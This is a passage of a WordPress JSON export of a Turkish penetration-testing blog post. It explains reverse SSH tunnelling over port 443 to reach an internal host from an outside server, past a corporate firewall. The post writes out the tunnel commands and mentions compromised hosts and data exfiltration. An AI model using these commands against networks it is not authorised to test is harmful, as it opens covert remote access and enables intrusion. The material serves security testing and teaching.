<\/a><\/div>\nTest i\u00e7in B sunucusuna yani uzakta ve bizim kontrol\u00fcm\u00fczde bulunan sunucuya port y\u00f6nlendirme yapmam\u0131z gerekecektir. Hangi portun y\u00f6nlendirilece\u011fi konusuna gelince;
\nY\u00f6nlendirilecek olan portun, A sunucusunun internete \u00e7\u0131kabilece\u011fi ve trafi\u011fi kontrol edilmeyen bir port olmas\u0131 \u00f6nemlidir. \u00d6rnek olarak 443 portunu kullanaca\u011f\u0131z. Bu port SSL trafi\u011fi i\u00e7in kullan\u0131ld\u0131\u011f\u0131ndan, genellikle kurum a\u011flar\u0131ndan d\u0131\u015far\u0131ya do\u011fru eri\u015fim izni verilen bir porttur.
\nBu nedenle B sunucusunun \u00f6n\u00fcnde bulunan modemden ya da firewalldan, 443 portuna gelen istekleri B sunucusunun 22 portuna y\u00f6nlendirece\u011fiz.
\nBu i\u015flemden sonra A sunucusundan a\u015fa\u011f\u0131daki gibi bir komut girilmesi gerekmektedir:
\n
\n<\/strong> #ssh \u2013p 443 \u2013f \u2013g \u2013N \u2013R8000:localhost:22 kullanici_adi@IP<\/strong>
\n
\n<\/strong> Burada ifade etti\u011fimiz 443 portu, A sunucusunun d\u0131\u015far\u0131ya ileti\u015fim kurmak i\u00e7in kulland\u0131\u011f\u0131 porttur. 8000 portu ise, A sunucusu \u00fczerinde ve 22 portunda \u00e7al\u0131\u015fan SSH trafi\u011finin y\u00f6nlendirildi\u011fi porttur. Bir di\u011fer deyi\u015fle modem ya da firewall \u00fczerinde 8000 portuna gelen isteklerin A sunucusundaki 22 portuna y\u00f6nlendirilmesi anlam\u0131n\u0131 ta\u015f\u0131r. Normalde kurum firewall\u2019una ya da modemine eri\u015febilseydik, hi\u00e7 bu i\u015flemlere gerek kalmadan 8000 portunun A sunucusunun 22 portuna y\u00f6nlendirilmesi tan\u0131m\u0131n\u0131 yapabilirdik ancak mal\u00fbm buna yetkimiz yok.
\nkullanici_adi de\u011feri B sunucusunda oturum a\u00e7mak i\u00e7in kullanaca\u011f\u0131m\u0131z kullan\u0131c\u0131 ad\u0131d\u0131r \u2013 \u00f6rne\u011fin admin<\/em><\/strong>. IP ise B sunucusunun internete \u00e7\u0131kt\u0131\u011f\u0131 IP\u2019dir.
\nBu ayarlamalardan sonra yukar\u0131da belirtti\u011fimiz komut A sunucusundan girildi\u011finde, e\u011fer herhangi bir engelleme yoksa, B sunucusuna oturum a\u00e7\u0131lacakt\u0131r. Giri\u015fte bizden parola soracak olursa, B sunucusunun parolas\u0131 girilmelidir. Zaten bu sunucu kontrol\u00fcm\u00fcz alt\u0131ndaki bir sunucu oldu\u011fu i\u00e7in parolas\u0131 bilinmektedir.
\nBa\u011flant\u0131 kurulduktan sonra as\u0131l amac\u0131m\u0131z olan A sunucusuna ba\u011flant\u0131 kurma i\u015flemine ge\u00e7ece\u011fiz. Bunun i\u00e7in B sunucusunda a\u015fa\u011f\u0131daki komut girilmelidir:<\/p>\n#ssh localhost \u2013p 8000<\/strong><\/p>\nBu komut girildikten sonra bizden yine parola girmemiz istenebilir. Bu durumda A sunucusunun parolas\u0131n\u0131 girdikten sonra oturum a\u00e7\u0131lm\u0131\u015f ve ilk amac\u0131m\u0131z olan B sunucusundan A sunucusuna eri\u015fim sa\u011flanm\u0131\u015f olacakt\u0131r.
\nBurada A sunucusunun parolas\u0131n\u0131 nereden bildi\u011fimiz sorusu akla gelebilir. A sunucusu, iki farkl\u0131 sunucu olabilir:
\nBirincisi bizim yine kendi sunucumuz olan ve s\u0131zma testi i\u00e7in kurum lokal a\u011f\u0131na ba\u011flad\u0131\u011f\u0131m\u0131z bir sunucu(PC). \u0130kinci olarak lokalde ele ge\u00e7irdi\u011fimiz ve kendimize bir kullan\u0131c\u0131 a\u00e7t\u0131\u011f\u0131m\u0131z kuruma ait bir sunucu. A sunucusunun t\u00fcr\u00fcne ba\u011fl\u0131 olarak direkt o sunucu \u00fczerinden veri s\u0131zd\u0131rma ya da benzeri ele ge\u00e7irme senaryolar\u0131 uygulanabilece\u011fi gibi testin t\u00fcr\u00fcne ve kapsam\u0131na ba\u011fl\u0131 olarak farkl\u0131 senaryolar da uygulanabilir.<\/p>\n","protected":false},"excerpt":{"rendered":"
Reverse SSH Kurum a\u011f\u0131nda bulunan bir bilgisayara uzaktan ba\u011flant\u0131 kurmak istedi\u011fimizde, normalde kurum firewall\u2019undan ilgili port y\u00f6nlendirme ayar\u0131 yap\u0131lmadan ve…<\/p>\n","protected":false},"author":1,"featured_media":621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,11,4],"tags":[78,76,26,22,94],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/hacks-mr-robot-build-hacking-raspberry-pi-2.jpg?fit=640%2C244&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-aa","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/630"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=630"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/630\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/621"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}